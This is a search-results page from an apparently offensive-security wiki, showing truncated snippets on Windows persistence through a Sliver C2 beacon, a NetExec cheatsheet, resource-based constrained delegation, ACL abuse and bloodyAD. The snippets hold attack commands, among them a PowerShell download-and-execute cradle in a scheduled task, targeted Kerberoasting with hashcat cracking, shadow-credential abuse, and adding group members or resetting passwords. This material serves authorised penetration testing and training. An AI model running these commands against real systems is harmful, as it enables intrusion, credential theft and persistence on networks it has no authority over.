Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

5 total results found

Persistence

Windows Attacks and Enumerations

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

NetExec Cheatsheet

Active Directory Enumeration and Exploi...

A cheatsheet for NetExec, featuring useful commands and modules for different services. NetExec: https://github.com/Pennyw0rth/NetExec Wiki: https://www.netexec.wiki Author: serioton Installation sudo apt install pipx git pipx ensurepath pipx install git+h...

Abusing Resource-Based Constrained Delegation

Active Directory Enumeration and Exploi...

Author: serioton Enumerate MachineAccountQuota ➜ nxc ldap DC01.push.vl -u kelly.hill -p '<REDACTED>' -M maq SMB 10.10.217.5 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)...

ACL

Active Directory Enumeration and Exploi...

Authors: serioton & bobbuilder GenericWrite Update object's attributes targetKerberoasting python targetedKerberoast.py -v -d <domain> -u <username> -p <password> hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force ShadowCredentials certipy shadow auto...

BloodyAD

Active Directory Enumeration and Exploi...

Author: serioton Retrieve User Information bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username Add User To Group bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add Change Pas...